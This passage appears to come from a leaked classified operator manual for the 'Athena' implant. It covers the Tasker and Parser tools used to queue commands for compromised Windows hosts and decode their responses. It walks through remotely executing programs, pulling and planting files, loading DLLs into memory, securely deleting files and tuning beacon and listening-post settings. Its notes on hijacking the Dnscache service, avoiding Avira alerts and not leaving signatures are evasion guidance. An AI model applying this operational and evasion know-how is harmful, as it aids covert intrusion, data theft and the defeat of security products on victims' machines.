This argument provides the ability to import a script
for processing.
-g GENERATE, --generate GENERATE
This argument provides the output path location.
-p PRIORITY, --priority PRIORITY
This argument provides ability to set the
priority/ordering (0..255) NOTE: 128->default and
0->highest.
-x, --persist
This argument provides ability to set the batch as a
persistent batch.
-e, --stoponerror
This argument provides ability to stop the batch on a
command execution error.
--id ID
This argument provides the ability to force a specific
initial task ID for a tasking session (usually just
used for debugging purposes - number is decoded as
hex).
--debug
This argument allows debugging information to be
included in the output directory.
Figure 16 - (S//NF) Tasker Command Line Options
8.2 (U) Command Line Options
(S//NF) The Tasker has multiple command line options; however the tool may be invoked
without any command line options. The local directory will be used to output results.
SECRET//NOFORN
26
SECRET//NOFORN
________________________________________________________________________
Usage: python.exe tasker.py
8.2.1 (U) RECEIPT
(S//NF) This argument defines an existing receipt filename to be used for processing. A receipt
file is generated by the Builder and contains all the settings for the configured implant.
8.2.2 (U) SCRIPT
(S//NF) This argument provides the ability to import a script for processing. A script is simply a
text file that contains all the commands in a batch script. The following sections will describe
the syntax for the command script.
8.2.3 (U) GENERATE
(S//NF) This argument provides the output path location. By default, the output will be stored in
the tasker_output directory. This option will override the location for the tasking output
information.
8.2.4 (U) PRIORITY
(S//NF) This argument provides ability to set the priority/ordering (0..255) NOTE:
128->default and 0->highest. Since each beacon will only retrieve a single batch command, this
option allows the user to prioritize the command files to the target.
8.2.5 (U) PERSIST
(S//NF) This argument provides ability to set the batch as a persistent batch. Normally when a
command file is processed on the server, it will be deleted. This option allows SAFETY files to
remain on the server and be processed for every beacon when no data is available for processing.
There is a special SAFETY command to prevent any data written to the disk but providing a
response from the target. If no data is available for a target, the target will not POST a response
to the server. NOTE: these persistent blocks have the responses stored in the SAFTIES
directory.
8.2.6 (U) STOPONERROR
(S//NF) This argument provides ability to stop the batch on a command execution error. Should
a command in the batch fail (e.g. PUT “c:\myfile”), the remaining batch can be cancelled to
prevent undefined behavior of the batch. By default, STOPONERROR is set to false. With
most commands (e.g. “exec net stat”), there are no side effects that need to be validated.
8.2.7 (U) ID
(S//NF) This argument provides the ability to force a specific initial task ID for a tasking
session (usually just used for debugging purposes - number is decoded as hex).
8.2.8 (U) DEBUG
(S//NF) This argument allows debugging information to be included in the output directory.
SECRET//NOFORN
27
SECRET//NOFORN
________________________________________________________________________
8.3 (U) User Interface
(S//NF) The Tasker shell interface allows for an interactive processing mode. There are two
input options. By simply selecting a management feature or command feature and pressing
enter, a wizard interface will be presented to select all required options for the feature.
Alternatively, for more advanced users, a command line option with tab-complete can be used to
process commands on a single line. The formatting of the command features is identical to the
script output format.
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
Welcome to the Athena Tasker shell.
Type help or ? to list commands.
Figure 17 - (S//NF) Tasker Main Menu
8.3.1 (U) Management Features
(S//NF) The Tasker Management Features provide control of the batch file created to task a
specific implant. The receipt defines the Parent ID of the target to process. Each command set is
known as a batch. Each batch file contains a unique Batch ID.
8.3.1.1 (U) Receipt
(S//NF) This command updates the target reference by loading the receipt.xml file defined for
the target.
Usage: receipt
Example: receipt builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Output:
New Receipt Loaded:
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test
8.3.1.2 (U) Generate
(S//NF) This command will generate an encrypted batch file ready for deployment on the
Listening Post. This command has additional options:
•
Priority (number 0..255): 0-highest, 255-lowest – priority for the server to process batch
•
Persist (bool): true-do not delete, false-delete once sent – force a file to always be run
SECRET//NOFORN
28
SECRET//NOFORN
________________________________________________________________________
o during a beacon cycle. This has lower priority than other batch commands
o waiting for processing.
•
Stop On Error (bool): true-do not continue processing batch on command failure
o false-continue processing all batch command irrelevant of error status
•
Output Path: location where the batch information is stored (default: .\tasker_output)
Usage: generate priority=128 persist=false stoponerror=false output=.\tasker\output
Example: generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-high, 255-low)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\console\tasker\tasker_output\test
RSA encrypting header with client public key
BINARY: __128_test_ABCD0064_63A95A3C
SCRIPT: __128_test_ABCD0064_63A95A3C_script.txt
BATCH: 63A95A3C
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
New Batch ID=0x8E9F251C
Output:
New Receipt Loaded:
SECRET//NOFORN
29
SECRET//NOFORN
________________________________________________________________________
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test
8.3.1.3 (U) LS
(S//NF) This command will list the batch id and all commands defined for this batch. They are
numbered from zero and can be referenced by this index.
Usage: ls
Example: ls
Output:
BATCH: DAD72903
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
8.3.1.4 (U) RM
(S//NF) This command will remove a command from the current batch. Each command is
reference by a zero based index. These indexes can be viewed by using the LS command as
shown above. The remove command will remove a single command from a batch.
Usage: rm
Example: rm 1
Output:
REMOVED: uninstall pre=0
8.3.1.5 (U) Import
(S//NF) This command will import commands from generated script. Script files are text files
with a .txt extension. This command incorporates external scripts into the current script. The
output will display the command that were imported. Use the LS command to view the complete
list.
Usage: import
Example: import tasker_output\test\__128_test_ABCD0064_DAD72903_script.txt
Output:
New Script Loaded: tasker\tasker_output\test\__128_test_ABCD0064_DAD72903
_script.txt
COMMAND: uninstall pre=0
8.3.1.6 (U) ID
(S//NF) The ID command is used to force a specific batch ID for the Tasker to generate. This
command is generally used for debug purposes only.
Usage: id
SECRET//NOFORN
30
SECRET//NOFORN
________________________________________________________________________
Example: id 12345678
Output:
New Batch ID=0x12345678
8.3.1.7 (U) Help
(S//NF) The Help command displays the Tasker Shell Interface Help as shown in Figure 9
(above). Each command has extensive help and can be displayed by request help .
Usage: help
8.3.2 (U) Command Features
(U) NOTE: System environment strings will be expanded at runtime (e.g. %SYSTEMROOT%).
8.3.2.1 (U) Execute
(S//NF) This command will import commands from generated script. Script files are text files
with a .txt extension. This command incorporates external scripts into the current script. The
output will display the commands that were imported. Use the LS command to view the
complete list.
Usage: execute pre= post= filename= arguments=
Example: execute
[execute] - execute a command on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: 0=foreground(sync) 1=background(async) task (0-default)
task (number 0-foreground, 1-background):
Description: specific application name on target to execute
filename (string):ipconfig
Description: specific arguments used with this command
arguments (string):/all
Output:
COMMAND: execute pre=0 post=0 task=0 filename="ipconfig" arguments="/all"
8.3.2.2 (U) Get
(S//NF) This command will retrieve a file from the target.
Usage: get flag= filename=
Example: get
[get] - download a file from the target
Description: prioritize this get request
flag (bool): (not currently used)
Description: specific file to retrieve
filename (string):c:\temp\myfile.txt
SECRET//NOFORN
31
SECRET//NOFORN
________________________________________________________________________
Output:
COMMAND: get flag=0 filename="c:\temp\myfile.txt"
8.3.2.3 (U) Put
(S//NF) This command will send a file to the target. The local file must be present during the
generate command. The request will also fail if the directory does not exist on the target.
Usage: put remote_filename= local_filename=
Example: put
[put] - upload a file to the target
Description: local filename to use
local_filename (string):c:\temp\myfile.txt
Description: remote filename on target
remote_filename (string):c:\windows\system32\a.txt
Output:
COMMAND: put remote_filename="c:\windows\system32\a.txt" local_filename=
"c:\temp\myfile.txt”
8.3.2.4 (U) Memload
(S//NF) This command will load a DLL onto the target in the same address space as the target
service. The nickname option can be used to reference this specific DLL for unload.
Warning
(S//NF) The nickname is case sensitive.
Usage: memload pre=0 post=0 nickname= filename=
Example: memload
[memload] - load a DLL onto the target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: a unique name used for this module
nickname (string):mymodule
Description: specific DLL module to load on target
filename (string):c:\temp\magic.dll
Output:
COMMAND: memload pre=0 post=0 nickname="mymodule" filename="c:\temp\magic.dll"
SECRET//NOFORN
32
SECRET//NOFORN
________________________________________________________________________
8.3.2.5 (U) Memunload
(S//NF) This command will unload a loaded module based on the nickname provided in the
memload command. WARNING: The nickname is case sensitive.
Usage: memunload pre=0 nickname=
Example:
[memunload] - unload a DLL already loaded on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: specific nickname used during memload
nickname (string):mymodule
Output:
COMMAND: memunload pre=0 nickname="mymodule"
8.3.2.6 (U) Set
(S//NF) This command will update a specific configuration option. The following list shows all
the configuration options available via this command.
interval={number} - beacon interval
jitter={percent} - beacon jitter in percentage
bootdelay={number} - amount of time to wait at each boot
hibernationdelay={number} - amount of time to wait after install
taskingdelay={number} - amount of time to wait before tasking
domains={string} - IP or URL of listening post
port={port} - port number of listening post
proxyport={port} - port number of proxy
proxyaddress={ipaddress} - port address of proxy
useragentstring={string} - user agent string sent with command
urlpath={string} - url path for tasking
acceptstring={string} - accept string
acceptlangstring={string} - accept language string
acceptencodingstring={string} - accept encoding string
ieproxyaddress={string} - IE proxy address string
wpadproxyaddress={string} - WPAd proxy address string
statefilepath={string} - state information processing path
batchexecutiontimeout={number} - max amount of time per batch
commandexecutiontimeout={number} - max amount of tie per command
maxchunksize={number} - max amount of bytes to process per send
maxcpuutilization={percent} - max cpu utilization during processing
maxprocessingdatasize={number} - max data size
uninstalldate={date(YYYY-MM-DDTHH:MM:SS)} - time to uninstall
deadmandelay={number} - maximum time to wait for successful beacon
beaconfailures={number} - maximum number of beacons before uninstall
killfilepath={string} - location of kill file
safety={number} - any number - this will perform a no-operation (NOOP)
Usage: set pre=0 post=0 =
Example:
[set] - update a specific configuration setting on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
SECRET//NOFORN
33
SECRET//NOFORN
________________________________________________________________________
Description: specific name of configuration
name:interval
Description: specific value for the configuration
value (number):20000
Output:
COMMAND: set pre=0 post=0 interval=20000
8.3.2.7 (U) Delete
(S//NF) This command will securely delete a file on the target systems.
Usage: delete
Example:
[delete] - securely delete a file on the target
Description: filename to use
filename (string):c:\temp\magic.dll
Output:
COMMAND: delete filename="c:\temp\magic.dll"
8.3.2.8 (U) Uninstall
(S//NF) This command will uninstall the target from the remote system.
Usage: uninstall
Example: uninstall
[uninstall] - uninstall tool from target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Output:
COMMAND: uninstall pre=0
8.4
(U) User Interface Example
(S//NF) Example: (Athena)
>python.exe tasker.py
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
Welcome to the Tasker shell.
Type help or ? to list commands.
SECRET//NOFORN
34
SECRET//NOFORN
________________________________________________________________________
tasker::no receipt>receipt builder_output\e0Eo\receipt.xml
New Receipt Loaded:
Receipt File: builder_output\e0Eo\receipt.xml
Parent ID: e0Eo
tasker::e0Eo>execute
[execute] - execute a command on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: specific application name on target to execute
filename (string):ipconfig
Description: specific arguments used with this command
arguments (string):/all
COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all"
Figure 18 - (S//NF) Tasker Shell Interface Example – Part 1
OR
>python.exe tasker.py
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
Welcome to the Tasker shell.
Type help or ? to list commands.
tasker::e0Eo>execute pre=0 post=0 filename=ipconfig arguments=/all
COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all"
tasker::e0Eo>generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-low, 255-high)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\athena_suite\tasker_output\e0Eo
RSA encrypting header with client public key
BINARY: __128_e0Eo_1111
SCRIPT: __128_e0Eo_1111_script.txt
BATCH: 00001111
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
Figure 19 - (S//NF) Tasker Shell Interface Example – Part 2
SECRET//NOFORN
35
SECRET//NOFORN
________________________________________________________________________
8.5 (U) Output
(S//NF) The Tasker produces a binary file (no extension) and a text file (.txt). The binary file
will be copied to the Listening Post for downloading to the target. The text file is an
unencrypted textual reference of the commands within the specific batch file which can be used
as an historical reference or as an input to the Tasker to generate a duplicate batch.
8.5.1 (U) Binary-Based Output File
(S//NF) Sample output: __128_test_ABCD0064_12345678
(S//NF) The binary file is an encrypted block that can only be decrypted by the target. The
Listening Post cannot decode the content of this file. To allow the Listening Post some
knowledge about the file’s content and priority, the filename is encoded as described below:
Table 9 – (U) Command File Encoding
Filename
Component
Value
Position 0
Description
_
The underbar shows that this is a standard batch file (e.g. __128).
+
The plus sign tells the server that this file is persistent and the server will not delete it after
processing (e.g. +_128).
Priority
number
This number represents the priority. 0-highest and 255-lowest (NOTE: 128-default)
Parent
string
This string represents the target parent ID. This name must match the parent ID reference
in the directory.
Child
hex
This string representation of hex is the target child ID. This name must match the child
ID reference in the directory.
Batch
hex
This string representation of hex is the batch ID. This is a random number which prevents
duplicate batches.
8.5.2 (U) Text-Based Output File
(S//NF) Sample output: __128_test_ABCD0064_12345678_script.txt
(S//NF) The text file contains the textual representation of the command. This content is stored
in the text file as UTF-8. The file name is the same as the corresponding binary file with the
_script.txt extension.
# ATHENA SCRIPT
execute pre=0 post=0 task=0 filename="ipconfig"
arguments="/all"
9. (U) Parser
(S//NF) Some general usage comments are presented below:
•
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
SECRET//NOFORN
36
SECRET//NOFORN
•
•
________________________________________________________________________
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
9.1 (U) Usage
(S//NF) This section contains information for parsing encrypted data from an implant. Figure 20
shows the command line options for the Parser.
Warning
(S//NF) Implant parsing may be completed on the low-side;
however, the operator should be aware that cryptographic key
data will be in the clear.
(S//NF) By default, the Parser will use the local directory for input and output directory
locations. A single receipt file or directory of receipt files can be included as a command line
option. By default, the builder_output\receipts directory will be used to process receipts built
with the Builder.
Parser Tool
usage: parser.py [-h] [-r RECEIPT] [-i INPUT] [-d] [-o OUTPUT] [-m]
Parser Configuration
optional arguments:
-h, --help
show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename or
directory of receipts to be used for processing.
-i INPUT, --input INPUT
This argument provides the ability to import a file
or directory of files.
-d, --debug
Enable decoding of unencrypted files from target
-o OUTPUT, --output OUTPUT
This argument provides the output path location.
-m, --nomark
This argument provides the ability to reuse a
processed directory. By default, the parsing code
will mark processed files with a date prefix. (e.g.
20150908_1010_{30996559-C169-490B-A40B-4ADB597E0D19}.
Figure 20 - (S//NF) Parser Command Line Options
9.2 (U) Command Line Options
9.2.1 (U) RECEIPT
(S//NF) This argument defines an existing receipt filename to be used for processing. This is the
file name with full path to the receipt file generated by the Builder.
SECRET//NOFORN
37
SECRET//NOFORN
________________________________________________________________________
9.2.2 (U) INPUT
(S//NF) This argument provides the ability to import a file or directory of files into the Parser.
By default, the Parser will search the parser_input directory for files that are not marked.
9.2.3 (U) OUTPUT
(S//NF) This argument provides the output path location. By default, the Parser will place the
output results in the parser_output directory.
9.2.4 (U) NOMARK
(S//NF) This argument provides the ability to reuse a processed directory. By default, the parsing
code will mark processed files with a date prefix. (e.g. 20150908_1010_30996559)
9.3 (U) Processing Responses and Safeties
(S//NF) The Parser will process all the output files from the Listening Post. By default, the
Listening Post will store the response file as __.
Example: test_ABCD0064_20151221_18_55_28_4091
(S//NF) Once the Parser processes the file, it will preface the filename with the parsing date.
Example: [20151221_18_59_26_6964]_test_ABCD0064_20151221_18_55_28_4091
(S//NF) This strategy will allow processed files to remain in the parser_input directory without
slowing down processing of newly added response files.
Note
(S//NF) To simplify processing, place newly uploaded
responses and safeties in the parser_input directory.
9.4 (U) Output
(S//NF) The Parser produces a text file containing the command and results of each response.
9.4.1 (U) Get
(S//NF) The Get command will also store a file with the same name as the results text file that
contains the content of the file retrieved:
Batch ID = 0x11111111
Command ID = 0x00000000
Command Type = get
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:47 2015 GMT
Filename = GET.TXT
Attributes = ARCHIVE
SECRET//NOFORN
38
SECRET//NOFORN
________________________________________________________________________
Modify Time: Mon Dec 21 22:08:02 2015 GMT
Create Time: Mon Dec 21 22:08:02 2015 GMT
File Size: 18 bytes
Output Filename:
d:\Development\Athena\Tests\TestCommandEngine\parser_output\test\ABCD0086\responses\20
151221_17_10_01_0375_get.bin
9.4.2 (U) Put
(S//NF) An example of the Parser output from a successful Put command is shown below:
Batch ID = 0x22222222
Command ID = 0x00000000
Command Type = put
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:52 2015 GMT
Filename = d:\Development\Athena\Tests\TestCommandEngine\win32\debug\put.txt
9.4.3 (U) Set
(S//NF) The SET command can return an error for the following reasons. The return code will
be ARESULT_DISK_ERROR(0xA0000104). The parser.py code has been changed to detect
this error code and change the output to “DATA NOT PERSISTED”. The dynamic data storage
will update the data in memory but will not be available at next reboot.
1) If the implant is running in ram-only mode, the attempt to write to disk will return an
error.
2) If the implant is configured with an invalid dyn_config file, the attempt to write to the
file will return an error.
Output: Error Code = DATA NOT PERSISTED
(S//NF) An example of the Parser output from a successful Set command is shown below:
Batch ID = 0x33333333
Command ID = 0x00000000
Command Type = set
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:08:58 2015 GMT
Set Type = killfilepath
Argument = c:\temp\kill
SECRET//NOFORN
39
SECRET//NOFORN
________________________________________________________________________
9.4.4 (U) Memload
(S//NF) An example of the Parser output from a successful Memload command is shown below:
Batch ID = 0x55555555
Command ID = 0x00000000
Command Type = memload
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:07 2015 GMT
Memory Address = 0x10000000
Nickname = testdll nickname
9.4.5 (U) Memunload
(S//NF) An example of the Parser output from a successful Memunload command is shown
below:
Batch ID = 0x66666666
Command ID = 0x00000000
Command Type = memunload
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:12 2015 GMT
Memory Address = 0x10000000
Nickname = testdll nickname
9.4.6 (U) Delete
(S//NF) An example of the Parser output from a successful Delete command is shown below:
Batch ID = 0x77777777
Command ID = 0x00000000
Command Type = delete
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:17 2015 GMT
Filename = d:\Development\Athena\Tests\TestCommandEngine\win32\debug\deleteme.txt
9.4.7 (U) Execute
(S//NF) An example of the Parser output from a successful Execute command is shown below:
SECRET//NOFORN
40
SECRET//NOFORN
________________________________________________________________________
Batch ID = 0x44444444
Command ID = 0x00000001
Command Type = execute
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:02 2015 GMT
Filename = %systemroot%\system32\net.exe
Process Return Code = 0x00000000
<>
New connections will be remembered.
Status
Local Remote
Network
------------------------------------------------------------------------------Unavailable Z:
\\10.3.2.91\Athena
Microsoft Windows Network
The command completed successfully.
9.4.8 (U) Uninstall
(S//NF) An example of the Parser output from a successful Uninstall command is shown below:
Batch ID = 0x99999999
Command ID = 0x00000000
Command Type = uninstall
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 23:50:00 2015 GMT
9.5
(S//NF) Error Codes
(S//NF) The implant contains some defined error codes. It is possible to receive
standard windows error codes but most errors are defined at -1(0xFFFFFFFF). The
following table has the defined error codes that can be returned from the implant.
Table 10 - (U) Error Codes
Error
Description
0
0xA0000001
0xA0000002
0xA0000003
0xA0000004
0xA0000005
0xA0000006
0xA0000007
0xA0000008
0xA0000101
Success
Invalid PE Header
Initialization Failure – target DLL
Teardown Failure – target DLL
Relocation Failure – target DLL
DLL Name Allocation Failure
Forwarder Entry Allocation Failure
Forwarder Buffer Overflow
Duplicate Entry
Timeout
SECRET//NOFORN
41
SECRET//NOFORN
________________________________________________________________________
0xA0000102
0xA0000103
0xA0000104
Size too big
Out of memory
Disk Error – invalid disk name or ram only
10.(U) Notes and Observations
10.1 (U) Installations of Hera Require a Reboot for Elevated Access Privileges
(S//NF) Hera hijacks the Dnscache service on installation. On Windows 7 and 8, this service is
running in a netsvcs instance by default but on Windows 8.1 and Windows 10, this service runs
as NetworkService. The NetworkService user context has reduced security capability on the
system. Due to the srvhost implementation, the service will only run in the netsvcs context after
the next reboot. To account for this deficiency and still provide immediate execution after
installation, the existing service will run as NetworkService (not SYSTEM) until next reboot at
which time the System user netsvcs will be engaged. As a result, until a reboot occurs, some
attempts to access files may fail, causing the command to be reported as an error.
10.2 (U) Installer and RAM_ONLY Versions Should Never Be Run From Disk
(S//NF) Copying the Installer or the RAM_ONLY version of the implant to the target computer
and then executing either application from disk will generate an alert when Avira is the PSP.
Avira flags the size of the data section as being too large and thus possibly malware. Avira does
not flag the size of the implant data section when these applications are run from memory as
intended.
10.3 (U) Builder Does Not Produce a “Bit Copy” of an Existing Configured
Implant
(S//NF) The Builder can ingest a configuration file from an existing implant and copy the
configuration settings to a new implant. However, the new implant will not be a bit by bit exact
copy of the original implant. Making an exact copy of an existing implant is not possible due to
the design of the implant and the desire to ensure entropy in between instances of the tool. Only
way to reproduce a bit copy of an existing implant would be to have a large section of zero byte
data in the configured implant which would be an easy way to correlate instances of the tool.
10.4 (U) Offline Installer May Report a False Failure on Windows 10
Installations
(S//NF) The Offline Installer may display an error message stating the following key is not
found:
Reg: SYSTEM\CurrentControlSet\Services\SstpSvc
Start -> 0x02
Type -> 0x20
(U) If the result of the installation process is a SUCCESS, the Key Not Found error should be
ignored.
10.5 (S//NF)Timeouts May Occur While Processing Large Files
(S//NF) If the Operator selects a very small chunk size (e.g., 2048 bytes) and a short duration for
either the command execution or batch execution timeout, the implant may not have enough time
SECRET//NOFORN
42
SECRET//NOFORN
________________________________________________________________________
to complete transferring the entire file to the LP before the duration timer expires when the file is
very large. Care should be taken to select values consistent with the operational environment
when configuring the chunk size (maximum number of bytes in a single block), command
execution timeout (terminates processing of long running commands), and batch execution
timeout (terminates processing of long running batches). A good operational practice would be
to assign reasonable values for these settings early in the batch when a large file is being
retrieved.
11. (U) Acronyms / Abbreviations
(U) The acronyms and abbreviations used in this document are shown in Table 11.
Table 11 - (U) Acronyms and Abbreviations
Acronym
Description
AXE
Athena Executable File
CNE
Computer Network Exploitation
CONOP
Concept of Operation
DLL
Dynamic Link Library
DNS
Domain Name Server
GB
Gigabyte
KB
Kilobyte
KIS
Kaspersky Internet Security
LP
Listening Post
OS
Operating System
PE
Portable Executable
PSP
Personal Security Product
RAM
Random Access Memory
SSL
Secure Sockets Layer
UI
User Interface
UM
User Manual
VM
Virtual Machine
SECRET//NOFORN
43
Source Exif Data:
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
Page Count : 49
.